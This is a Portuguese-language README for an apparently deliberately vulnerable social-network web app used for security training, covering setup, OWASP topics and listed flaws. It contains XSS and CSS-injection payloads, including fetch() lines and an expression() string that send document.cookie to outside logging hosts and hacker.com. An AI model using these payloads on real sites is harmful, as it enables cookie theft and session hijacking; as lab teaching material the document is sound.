Damn Vulnerable Social Network

Uma aplicação vulnerável indicada para testes e entendimento de conceitos de segurança em Aplicações WEB

Requisitos:

• Java 17
• Node 19
• Docker
• Docker Compose
• Postgres instalado. (Caso não tenha o Docker e Docker Compose)

Rodar a aplicação

1. Entrar na pasta do front (dvsn/front) e dar build no projeto, para que os arquivos sejam colocados na pasta estática da api.

NPM:

npm install
npm build

YARN:

yarn
yarn build

2. Subir as aplicações utilizando o Docker Compose. Rodar o comando abaixo na pasta raíz do projeto.

docker-compose up

Obs.: Caso queira subir apenas o banco de dados, é necessário comentar as demais aplicações no docker-compose.yml.

3. Criação do banco de dados.

• Entrar na pasta dvsn e executar o script:

  $ ./create-database.sh

4. Abrir o VS Code ou IntelliJ e rodar a aplicação.

Main Class -> RootApplication.java

Usuários disponíveis

Hints:

• Certificados

Assuntos abordados:

• OWASP TOP 10
• CSRF
• Cookies (HttpOnly, Secure, SameSite)
• Alguns cuidados com LocalStorage e SessionStorage
• Como manter componentes/frameworks/libs seguras e atualizadas
• Cabeçalhos CSP e X-Frame-Options

Software Composition Analysis (SCA)

• NodeJS/JavaScript: yarn audit html report

Vulnerabilidades

• SQL Injection
• XSS
• Cookie
  • É apenas um base64 e a aplicação confia no que o cliente enviar.

fetch('https://servidor-de-log.free.beeceptor.com/todos?cookie=' + document.cookie) fetch('http://logger.crescer.lab/?cookie=' + document.cookie)

Payloads:

• XSS

  <img src="https://github.com/sgtux/lab-crescer-cwi/raw/main/a" onerror="alert('XSS')" />

• SVG

  
  <?xml version="1.0" standalone="no"?>
  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

- CSS Injection
/hello?nome=Teste#red;margin-left:50px;background-image:url('http://localhost:8080/favicon.ico')
- expression(document.write('<iframe src="https://github.com/sgtux/lab-crescer-cwi/raw/main/ .= "http://hacker.com?cookie=' + document.cookie.escape() + " />'))
background-image: url(javascript:alert('XSS'))
https://www.mediawiki.org/wiki/Preventing_XSS_Attacks_through_CSS_Whitelisting

## Exemplos de vulnerabilidades:
- <a href="https://security.snyk.io/vuln/SNYK-JS-MATERIALIZECSS-2324800">XSS materialize-css</a>

## Referências
https://developer.mozilla.org/pt-BR/docs/Web/JavaScript/Reference/Global_Objects/eval
https://github.com/payloadbox/xss-payload-list